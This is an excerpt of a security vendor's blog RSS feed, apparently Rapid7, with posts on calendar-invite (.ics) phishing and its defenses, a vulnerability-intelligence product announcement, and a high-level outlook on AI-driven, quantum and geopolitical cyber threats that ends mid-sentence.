</strong></span><a href="https://www.rapid7.com/research/report/threat-landscape-report-2025-q3/" target="_blank"><span style='font-size: undefined;'><strong>Click here to download the report</strong></span></a><span style='font-size: undefined;'><strong>. </strong></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-rapid7-q3-2025-threat-landscape-report</link>
      <guid isPermaLink="false">bltf411abbefaa16e2d</guid>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Ransomware]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 12 Nov 2025 13:55:11 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf1878ef573c5427e/691491f1a62c1d1b126572f8/Threat-Landscape-Q3-2025-card.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[When Your Calendar Becomes the Compromise]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">A new meeting on your calendar or a new attack vector?</h2><p style="direction: ltr;"><span style='font-size: undefined;'>It starts innocently enough. A new meeting appears in your Google calendar and the subject seems ordinary, perhaps even urgent: </span><span style='font-size: undefined;'><em>“Security Update Briefing,”</em></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><em>“Your Account Verification Meeting,”</em></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><em>“Important Notice Regarding Benefits.” </em></span><span style='font-size: undefined;'>You assume you missed this invitation in your overloaded email inbox, and click “Yes” to accept.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Unfortunately, calendar invites have become an overlooked delivery mechanism for social engineering and phishing campaigns. Attackers are increasingly abusing the .ics file format, a universally trusted, text-based standard to embed malicious links, redirect victims to fake meeting pages, or seed events directly into users’ calendars without interaction. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because calendar files often bypass traditional email and attachment defenses, they offer a low-friction attack path into corporate environments. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Defenders should treat .ics files as active content, tighten client defaults, and raise awareness that even legitimate-looking calendar invites can carry hidden risk.</span></p><h2><span style='font-size: undefined;'>The underestimated threat of .ics files</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The iCalendar (.ics) format is one of those technologies we all rely on without thinking. It’s text-based, universally supported, and designed for interoperability between Outlook, Google Calendar, Apple, and countless other clients.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Each invite contains a structured list of fields like SUMMARY, LOCATION, DESCRIPTION, and ATTACH. Within these, attackers have found an opportunity: they can embed URLs, malicious redirects, or even base64-encoded content. The result is a file that appears completely legitimate to a calendar client, yet quietly delivers the attacker’s message, link, or payload.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because calendar files are plain text, they easily slip through traditional security controls. Most email gateways and endpoint filters don’t treat .ics files with the same scrutiny as executables or macros. And since users expect to receive meeting invites, often from outside their organization, it’s an ideal format for social engineering.</span></p><h2 style="direction: ltr;">How threat actors abuse the invite</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Over the past year, researchers have observed a rise in campaigns abusing calendar invites to phish credentials, deliver malware, or trick users into joining fake meetings. These attacks often look mundane but rely on subtle manipulation:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>The lure:</strong></span><span style='font-size: undefined;'> A professional-looking meeting name and sender, sometimes spoofed from a legitimate organization.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>The link:</strong></span><span style='font-size: undefined;'> A URL hidden in the DESCRIPTION or LOCATION field, often pointing to a fake login page or document-sharing site.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>The timing:</strong></span><span style='font-size: undefined;'> Invites scheduled within minutes, creating urgency (“Your access expires in 15 minutes — join now”).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>The automation:</strong></span><span style='font-size: undefined;'> Calendar clients that automatically add external invites, ensuring the trap appears directly in the user’s daily schedule.</span></p></li></ul><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt47a84aea997d9ffb/690cec5083a0d67b27cd8760/Cal1.png" height="411" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Cal1.png" asset-alt="Cal1.png" width="936" max-width="936" max-height="411" style="max-width: 936px; width: 936px; max-height: 411px; height: 411px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt47a84aea997d9ffb/690cec5083a0d67b27cd8760/Cal1.png" data-sys-asset-uid="blt47a84aea997d9ffb" data-sys-asset-filename="Cal1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Cal1.png" sys-style-type="display"/></figure><p style="text-align: left;direction: ltr;"><span style='font-size: undefined;'><em>Example of where some of the malicious components would reside in the .ics file</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>It’s clever, low-effort social engineering leveraging trust in a system built for collaboration.</span></p><h2 style="direction: ltr;">The “invisible click” problem</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The real danger of malicious calendar invites isn’t just the link inside,  it’s the automatic delivery mechanism. In certain configurations, Outlook and Google Calendar will automatically process .ics attachments and create tentative events, even if the user never opens or even receives the email. That means the malicious link is now part of the user’s trusted interface with their calendar.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This bypasses the usual cognitive warning signs. The email might look suspicious, but the event reminder popping up later? That feels like part of your day. It’s phishing that moves in quietly and waits.</span></p><h2 style="direction: ltr;">Why traditional defenses miss it</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Security tooling has historically focused on attachments that execute code or scripts. By contrast, .ics files are plain text and standards-based, so they don’t inherently appear dangerous. Many detection engines ignore or minimally parse them.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Attackers exploit that gap. They rely on the fact that few organizations monitor for BEGIN:VCALENDAR content or inspect calendar metadata for embedded URLs. Once delivered, the file can bypass filters, land in the user’s calendar, and lead to a high-confidence click.</span></p><h2 style="direction: ltr;">What defenders can do now</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Defending against calendar-based attacks begins with recognizing that these are not edge cases anymore. They’re a natural evolution of phishing  where user convenience becomes the delivery mechanism.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Here are a few pragmatic steps every organization should consider:</span></p><ol><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Treat .ics files like active content. Configure email filters and attachment scanners to inspect calendar files for URLs, base64-encoded data, or ATTACH fields.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Review calendar client defaults. Disable automatic addition of external events when possible, or flag external organizers with clear warnings.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Sanitize incoming invites. Content disarm and reconstruction (CDR) tools can strip out or neutralize dangerous links embedded in calendar fields.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Raise awareness among users. Train employees to verify unexpected invites — especially those urging immediate action or containing meeting links they didn’t anticipate. Employees can also follow the helpful advice in this </span><a href="https://support.google.com/calendar/answer/13159188?hl=en"><span style='font-size: undefined;'>Google Support article</span></a><span style='font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Use strong identity protection. Multi-factor authentication and conditional access policies mitigate the impact if a phishing link successfully steals credentials.</span></p></li></ol><p style="direction: ltr;"><span style='font-size: undefined;'>These steps don’t eliminate the threat, but they significantly increase friction for attackers and their malware.</span></p><h2>A quiet evolution in social engineering campaigns</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Malicious calendar invites represent a subtle yet telling shift in attacker behavior: blending into legitimate business processes rather than breaking them. In the same way that invoice-themed phishing emails once exploited trust in accounting workflows, .ics abuse leverages the quiet reliability of collaboration tools.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As organizations continue to integrate calendars with chat, cloud storage, and video platforms, the attack surface will only expand. Links inside invites will lead to files in shared drives, authentication requests, and embedded meeting credentials. These are all opportunities for exploitation.</span></p><h2 style="direction: ltr;">Rethinking trust in everyday workflows</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Defenders often focus on the extraordinary like zero days, ransomware binaries, and new exploits. Yet the most effective attacks remain the simplest: exploiting human trust in ordinary digital habits. A calendar invite feels harmless and that’s exactly why it works.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The next time an unexpected meeting appears in your calendar, it might be more than just a double-booking. It could be a reminder that security isn’t only about blocking malware, but about questioning what we assume to be safe.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/ve-when-your-calendar-becomes-the-compromise-phishing</link>
      <guid isPermaLink="false">blt91ccd85a56efb6a8</guid>
      <category><![CDATA[Phishing]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Social Engineering]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Thu, 06 Nov 2025 18:42:23 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Defend Smarter, Not Harder: The Power of Curated Vulnerability Intelligence]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='color:rgb(27, 28, 29);font-size: undefined;'>Let’s be honest, we as an industry spend far too long responding to issues that simply don’t matter. Chasing down false positives, reviewing threat intelligence reports that bear no relation to our sector, and more recently reviewing vulnerability advisories of systems not deployed within the environment. To address this challenge, Rapid7 delivers actionable intelligence through </span><a href="/blog/post/2025/04/23/from-noise-to-action-introducing-intelligence-hub/" target="_self"><span style='font-size: undefined;'>Intelligence Hub</span></a><span style='color:rgb(27, 28, 29);font-size: undefined;'>, which we announced in April of this year. </span></p><p style="direction: ltr;"><span style='color:rgb(27, 28, 29);font-size: undefined;'>Today marks a day where we are delighted to incorporate </span><a href="/about/press-releases/rapid7-accelerates-exposure-remediation-with-ai-generated-risk-insights-and-enhanced-vulnerability-intelligence/" target="_self"><span style='font-size: undefined;'>vulnerability intelligence</span></a><span style='color:rgb(27, 28, 29);font-size: undefined;'> within Rapid7’s Command Platform. The purpose of this capability is to identify the vulnerabilities that actually matter, rather than relying on generic security ratings or trying to decipher whether the amber rating is dark orange or not.  </span></p><p style="direction: ltr;"><span style='color:rgb(27, 28, 29);font-size: undefined;'>Our approach within Rapid7 has always been focused on quality curation over sheer volume to deliver high-fidelity intelligence - because information without context isn't intelligence, it's just noise. Across </span><a href="https://www.rapid7.com/research/"><span style='font-size: undefined;'>Rapid7 Labs</span></a><span style='color:rgb(27, 28, 29);font-size: undefined;'>, our teams of experts, assisted by our proprietary AI/ML analysis, work to actively cut through the constant noise of raw threat data, transforming it into actionable, contextualized insights delivered across the Rapid7 </span><a href="https://www.rapid7.com/platform/"><span style='font-size: undefined;'>Command Platform</span></a><span style='color:rgb(27, 28, 29);font-size: undefined;'>. </span></p><p style="direction: ltr;"><span style='color:rgb(27, 28, 29);font-size: undefined;'>Instead of overwhelming security teams, we surface only the most critical findings regarding actively exploited vulnerabilities, threat actors, and their motivations. This high-fidelity intelligence enables faster prioritization and mitigation of the risks that genuinely matter.</span></p><h2><span style='color:rgb(67, 67, 67);'>How Rapid7 curates vulnerability intelligence that actually matters</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Research led vulnerability intelligence has been a core strategy within Rapid7 Labs for many years. It allows us to reactively defend against current threats through comprehensive </span><a href="https://attackerkb.com/search?q=&amp;hasRapid7Analysis=1&amp;sort=newest-created"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'>, product coverage, and subject matter expert led decision making. It also allows us to proactively identify and remediate new vulnerabilities long before the threat actors can leverage them. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We do this through our zero day research, where we find and coordinate </span><a href="https://www.rapid7.com/blog/?blog_tags=Vulnerability+Disclosure"><span style='font-size: undefined;'>disclosure</span></a><span style='font-size: undefined;'> of new high impact vulnerabilities, giving our customers industry first coverage and strengthening the broader cybersecurity ecosystem. The next step in this strategy is curating our vulnerability intelligence capabilities directly into our products.</span></p><h2><span style='color:rgb(67, 67, 67);'>Explore CVEs by Threat Actor, Exploitability, and Impact</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>With Intelligence Hub, we started an evolution that aims to deliver this curated, high-fidelity threat intelligence. Starting next month, Intelligence Hub will deliver a new, comprehensive view into critical vulnerabilities via curated CVE profiles. These profiles will provide security teams with the context needed for actionable, adversary-aware prioritization of threats that pose the highest risk to their organization before they escalate. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Expertly curated by the Rapid7 Labs Vulnerability Intelligence team, the new CVE Library will serve as your organization’s tailored, trusted source of which CVEs are actively exploited, by whom, and what impact they have to your environment by providing:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE properties</strong></span><span style='font-size: undefined;'> based on public metadata, along with available Metasploit Modules for teams to identify, exploit, and perform post-exploitation actions on CVEs.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>AttackerKB assessments </strong></span><span style='font-size: undefined;'>for comprehensive analysis into the critical vulnerabilities that matter and how any exploit works. </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Threat actor and campaign details</strong></span><span style='font-size: undefined;'> curated from proprietary Rapid7 Labs vulnerability and threat research.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>MITRE ATT&CK mapping </strong></span><span style='font-size: undefined;'>of TTPs (</span><span style='font-size: undefined;'><em>coming early 2026)</em></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Dark web mentions </strong></span><span style='font-size: undefined;'>Take back control - understand what will likely be exploited next with our proprietary ‘Probabilistic likelihood of exploitation’ assessment (</span><span style='font-size: undefined;'><em>coming early 2026).</em></span></p></li></ul><p style="direction: ltr;">⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdab430e12c331695/6901685f3a6db2d57fe488cf/Vi2.png" height="521" alt="Rapid7 Command Platform dashboard for CVE Intelligence" caption="CVE Profile in Intelligence Hub of recent CVE-2025-20362." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Rapid7 Command Platform dashboard for CVE Intelligence" width="683" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdab430e12c331695/6901685f3a6db2d57fe488cf/Vi2.png" data-sys-asset-uid="bltdab430e12c331695" data-sys-asset-filename="Vi2.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="CVE Profile in Intelligence Hub of recent CVE-2025-20362." data-sys-asset-alt="Rapid7 Command Platform dashboard for CVE Intelligence" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">CVE Profile in Intelligence Hub of recent CVE-2025-20362.</figcaption></div></figure><h2><span style='color:rgb(27, 28, 29);'>Accelerate exposure remediation with Intelligence Hub & Remediation Hub</span></h2><p style="direction: ltr;"><span style='color:rgb(27, 28, 29);font-size: undefined;'>The same curated threat actor and campaign insights from Intelligence Hub’s CVE profiles will also be integrated into </span><a href="/blog/post/pt-remediate-vulnerabilities-faster-with-ai-generated-risk-intelligence/" target="_self"><span style='font-size: undefined;'>Remediation Hub</span></a><span style='color:rgb(27, 28, 29);font-size: undefined;'> alongside new AI-powered remediation guidance, helping security teams to prioritize the most impactful remediations. With one click, joint customers can seamlessly pivot to Intelligence Hub’s detailed Threat Actor and Campaigns pages to dive deeper.</span></p><p style="direction: ltr;"><span style='color:rgb(27, 28, 29);font-size: undefined;'>This unified approach enables security teams to prioritize actions based on a clear, AI-generated summary, validate the urgency with external, real-world threat actor and campaign insights from Intelligence Hub, and take immediate, informed action - all without leaving Rapid7’s Command Platform.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3a6dbc33a23bf09/6901685f4e9e4134cca5efdf/VI3.png" height="533" alt="VI3.png" caption="Threat Actors associated with a remediation project in Remediation Hub." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="VI3.png" width="678" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3a6dbc33a23bf09/6901685f4e9e4134cca5efdf/VI3.png" data-sys-asset-uid="bltd3a6dbc33a23bf09" data-sys-asset-filename="VI3.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Threat Actors associated with a remediation project in Remediation Hub." data-sys-asset-alt="VI3.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Threat Actors associated with a remediation project in Remediation Hub.</figcaption></div></figure><h2><span style='color:rgb(27, 28, 29);'>End the noise: Curated intelligence for confident decisions</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>With expanded vulnerability intelligence capabilities and high-impact integration with Remediation Hub, Intelligence Hub empowers teams to execute </span><span style='font-size: undefined;'><strong>threat-informed </strong></span><span style='font-size: undefined;'>remediation without the added burden of needing to piece together CVE details from across the internet. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Coupled with its expansive repository of actionable insights into threat actors, campaigns, IOCs, and more, Intelligence Hub is your team’s integrated solution to expert-vetted, low-noise vulnerability and threat intelligence that you can trust.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Learn more about </span><a href="/platform/threat-intelligence-tip/" target="_self"><span style='font-size: undefined;'>Rapid7’s Intelligence Hub</span></a><span style='font-size: undefined;'>.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-the-power-of-curated-vulnerability-intelligence</link>
      <guid isPermaLink="false">blt03b656c261f56f1c</guid>
      <category><![CDATA[Threat Intel]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Stephen Fewer]]></dc:creator>
      <pubDate>Wed, 29 Oct 2025 12:55:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3cc8c945f314ec1f/68b9a045a7d14357b3ba893b/blog-hero-texture-lines.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Key Emerging Cybersecurity Threats and Challenges for 2025 and Beyond]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>The global threat landscape is undergoing an unprecedented transformation. Organizations are facing dizzying levels of complexity, driven by rapid technological innovation, the widespread adoption of artificial intelligence, and the expected disruptive effects of quantum computing. At the same time, shifting geopolitical dynamics, the rise of sophisticated cybercriminal networks, and the introduction of new regulatory frameworks are fundamentally reshaping how the private and public sectors must approach security. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Against this backdrop, this blog post examines the cyber threats expected to emerge within the next 3 to 5 years. It explores the challenges posed by these constantly evolving risks, analyzing the technical aspects of cyber threats as well as the strategic, regulatory, and human factors that define the modern security landscape. Most importantly, it provides actionable insights that organizations can utilize to strengthen their cyber resilience. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By exploring these trends and their implications, organizations can position themselves to better anticipate, adapt to, and mitigate the rapidly evolving risks inherent in an increasingly digital and interconnected global environment.</span></p><h2 style="direction: ltr;">AI‑driven attacks and autonomous threat agents</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The integration of advanced artificial intelligence into cyberattack tools is rapidly changing the dynamics of the threat landscape. Attackers are leveraging generative AI, deep learning, and reinforcement learning to automate attacks, develop adaptive malware, and conduct highly targeted spear-phishing campaigns at a scale previously unimaginable. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The rise of AI-powered tools, underground services, and autonomous threat agents enables adversaries to scan for vulnerabilities, bypass security controls, and exploit systems with unprecedented speed and sophistication (Figure 1). These agents can autonomously learn from failed attacks and modify their tactics in real-time, dramatically reducing the window organizations have to detect and respond to threats. </span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20a80fba16675fb5/68ffd4634e9e4172fca5e862/EMT1.png" height="519" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="EMT1.png" asset-alt="EMT1.png" width="642" max-width="642" max-height="519" style="max-width: 642px; width: 642px; max-height: 519px; height: 519px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20a80fba16675fb5/68ffd4634e9e4172fca5e862/EMT1.png" data-sys-asset-uid="blt20a80fba16675fb5" data-sys-asset-filename="EMT1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="EMT1.png" sys-style-type="display"/></figure><p style="text-align: left;direction: ltr;"><span style='font-size: undefined;'><em>Figure 1 - Voice phishing service with an AI system</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>With deepfake technologies and AI-driven social engineering attacks becoming more realistic and widespread, even traditional security awareness programs struggle to keep pace. Furthermore, democratizing AI tools lowers the barrier-to-entry for cybercriminals, enabling a surge in sophisticated attacks from less technically skilled actors. As AI systems become targets, adversaries also develop techniques to poison training data, manipulate AI model outputs, and undermine AI-powered defenses, escalating the arms race between attackers and defenders.</span></p><h3><span style='color:rgb(102, 102, 102);'>What to expect in the coming years </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Expect AI-driven threats to become more autonomous, creative, and difficult to attribute. Attackers will leverage multi-modal AI (combining text, audio, image, and video) to create almost undetectable social engineering and fraud attempts. “Off-the-shelf” AI attack platforms will empower even non-experts to launch sophisticated attacks, resulting in a surge of diverse threat actors. AI-powered defenses will enter a continuous cycle of adversarial evolution, where blue and red teams use AI to outpace each other. The risk of AI-generated misinformation and synthetic media attacks will escalate, impacting trust in business, elections, and public discourse. Ultimately, the complexity and frequency of AI-driven cyber incidents will increase, challenging organizations to maintain the speed and adaptability needed for effective defense.</span></p><h3><span style='color:rgb(102, 102, 102);'>How to anticipate and respond</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations must adopt a proactive, intelligence-driven cybersecurity strategy to counter the evolution of AI-driven threats. This entails integrating AI and machine learning tools for detection and response, anticipatory threat hunting, anomaly detection, and behavioral analytics. Building robust threat intelligence capabilities and collaborating with external partners and information-sharing networks will be essential to identifying emerging AI-based threats early. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations should prioritize the development of resilient AI models, with mechanisms for ongoing validation, adversarial testing, and defense against data poisoning and model manipulation. Employee training must evolve to address new forms of AI-powered social engineering, and security teams need to invest in rapid response and remediation capabilities. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Moreover, embracing explainable AI and transparency in defensive AI models will be critical for building trust and ensuring compliance with regulatory requirements in AI-augmented environments. Strategic investment in AI talent and upskilling security teams will help organizations stay ahead of adversaries in this fast-moving landscape.</span></p><h2 style="direction: ltr;">Quantum computing threats and cryptographic risks</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The emergence of quantum computing represents a significant and imminent shift in the cybersecurity landscape, particularly concerning ransomware and other malware threats. By harnessing the principles of quantum mechanics, quantum computers process information in fundamentally different ways than classical computers, unlocking the ability to solve complex issues at unprecedented speeds. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This transformative leap in computational power carries profound implications for digital security. While quantum computing promises advancements in various fields, it poses serious challenges for existing cryptographic systems, many of which underpin current methods of protecting data from malicious actors. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As ransomware and malware continue to evolve and threaten organizations worldwide, the prospect of quantum-enabled attacks intensifies the urgency for developing quantum-resistant security strategies. Understanding the potential impact of quantum computing on cybersecurity is, therefore, essential as we prepare for a future where these powerful machines could both disrupt and redefine the digital threat landscape.</span></p><h3><span style='color:rgb(102, 102, 102);'>Cryptographic risks</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Modern digital security relies heavily on cryptographic algorithms such as RSA (Rivest-Shamir-Adleman) and ECC (Elliptic Curve Cryptography). These public-key encryption schemes are widely used to secure communications, protect sensitive data, and authenticate users across the internet. The security of these algorithms is based on the computational difficulty of factoring large numbers (RSA) or solving discrete logarithm problems (ECC) —  tasks that are infeasible for even the most powerful classical supercomputers within a reasonable timeframe. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Once sufficiently advanced, however, quantum computers can break these cryptographic schemes using algorithms such as Shor’s. Shor’s algorithm enables a quantum computer to efficiently factor large numbers and solve discrete logarithms, rendering RSA and ECC encryption obsolete. This vulnerability threatens data security at rest, in transit, and across a wide array of critical infrastructure.</span></p><h3><span style='color:rgb(102, 102, 102);'>Ransomware implications</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The advent of quantum decryption capabilities could be transformative for ransomware actors. Many ransomware operations rely on strong encryption to lock victims out of their data, demanding payment for its return. If quantum computers can easily break existing encryption, attackers could bypass these defenses altogether, potentially gaining unauthorized access to sensitive information without needing to deploy traditional ransomware payloads. This would enable them to extort organizations for data access and prevent mass disclosure of previously protected data. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Moreover, quantum-powered attacks could render current recovery and mitigation strategies ineffective. The sheer speed at which quantum computers could decrypt data would shorten the window for detection and response, increasing the likelihood of catastrophic breaches and large-scale data leaks.</span></p><h3><span style='color:rgb(102, 102, 102);'>“Harvest now, decrypt later” attacks</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>In recent years, harvest-now, decrypt-later (HNDL) attacks have become a growing phenomenon due to the introduction of quantum computing. These attacks involve adversaries intercepting and storing encrypted communications or sensitive datasets today, expecting future quantum computers to decrypt them once current cryptographic standards are broken. The danger lies in the long-term value of the stolen information, such as government communications, research archives, intellectual property, and defense data that could remain strategically valuable for decades. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>HNDL campaigns are not isolated cyber incidents, but rather components of long-term, state-sponsored espionage operations. Such campaigns typically progress through several key stages:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Infiltration: </strong></span><span style='font-size: undefined;'>Attackers gain access by exploiting weaknesses in public or private networks, supply chains, or managed service providers. Common entry vectors include zero-day vulnerabilities in VPNs and firewalls, compromised software dependencies, and phishing campaigns aimed at administrators or contractors.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Data Harvesting: </strong></span><span style='font-size: undefined;'>Once inside a target environment, attackers collect large volumes of encrypted data, including secure emails, TLS-encrypted communications, and encrypted database backups. Rather than attempting immediate decryption, they store this data for future use.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Stealth and Persistence: </strong></span><span style='font-size: undefined;'>Advanced Persistent Threat (APT) groups maintain long-term access through covert tools such as backdoors, rootkits, and malware that imitate legitimate system processes. These implants are engineered for longevity, often remaining undetected for years.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Storage and Exfiltration: </strong></span><span style='font-size: undefined;'>The stolen data is then exfiltrated to state-controlled or anonymized infrastructure for long-term storage. Analysts often use machine learning tools to catalog and index the datasets, preparing them for decryption once quantum capabilities mature.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>According to intelligence assessments from the EU, the United States, and allied cybersecurity agencies, state-sponsored threat actors from China, Russia, and North Korea are at the forefront of such operations. Their campaigns often combine traditional cyber espionage with advanced cryptographic interception. Typical methods include supply chain compromises, targeted intrusions into telecommunications networks, and data exfiltration from cloud storage and VPN infrastructure, all designed to harvest large volumes of encrypted traffic. Chinese cyber units, for example, are believed to focus on long-term collection of diplomatic and industrial data. At the same time, Russian actors often target government networks and critical infrastructure systems to secure intelligence and strategic leverage. North Korean groups, though smaller in scale, have been linked to financially motivated quantum-era data theft and cryptocurrency exchange breaches.</span></p><h3><span style='color:rgb(102, 102, 102);'>What to expect in the coming years </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Quantum attacks will shift from theoretical to practical as advancements accelerate. The likelihood of “breakthrough” announcements in quantum computing will rise, sparking urgent, global cryptographic migration campaigns. We will probably see more harvest now, decrypt later attacks, and see breaches come to light, exposing sensitive data from years past. Standards for PQC will solidify, but adoption will be uneven, creating a window of vulnerability for late adopters. Sectors with long data retention or high-value secrets (e.g. finance, defense, healthcare) will be prime targets. Expect new hybrid crypto attacks (mixing classical and quantum techniques) and potential attacks against blockchain and digital identity infrastructure. As the race for quantum supremacy heats up geopolitically, national-level initiatives and mandates for PQC transition will become common.</span></p><h3><span style='color:rgb(102, 102, 102);'>How to anticipate and respond</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>In response, organizations must take immediate and proactive steps to prepare for the era of quantum-enabled ransomware. Transitioning to post-quantum cryptography (PQC) is a complex but necessary undertaking, requiring extensive upgrades, pilot programs, and collaboration with standards bodies like NIST to ensure compliance and alignment with best practices. Identifying and prioritizing cryptographic assets that require long-term confidentiality, architect systems for cryptographic agility, and staying vigilant through ongoing risk assessments and engagement with quantum-safe technology providers is crucial. Only through coordinated global action, leadership involvement, and widespread awareness can organizations hope to mitigate the catastrophic risks posed by future quantum-powered ransomware attacks.</span></p><h2 style="direction: ltr;">Geopolitical cyber threats and hybrid warfare</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The landscape of geopolitical cyber threats is intensifying, with state-sponsored actors leveraging cyberspace as a critical domain for power projection, espionage, and disruption. Over the past decade, cyber conflicts have escalated between major powers such as the United States, China, Russia, Iran, and North Korea, as well as between regional adversaries. The war in Ukraine has showcased the integration of cyber operations with kinetic military campaigns, involving disruptive attacks on critical infrastructure, information warfare, and coordinated influence operations targeting civilian populations and international allies. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Hybrid warfare, a blend of conventional, cyber, economic, and informational tactics, is expected to become the norm, with sophisticated threat actors targeting governments and 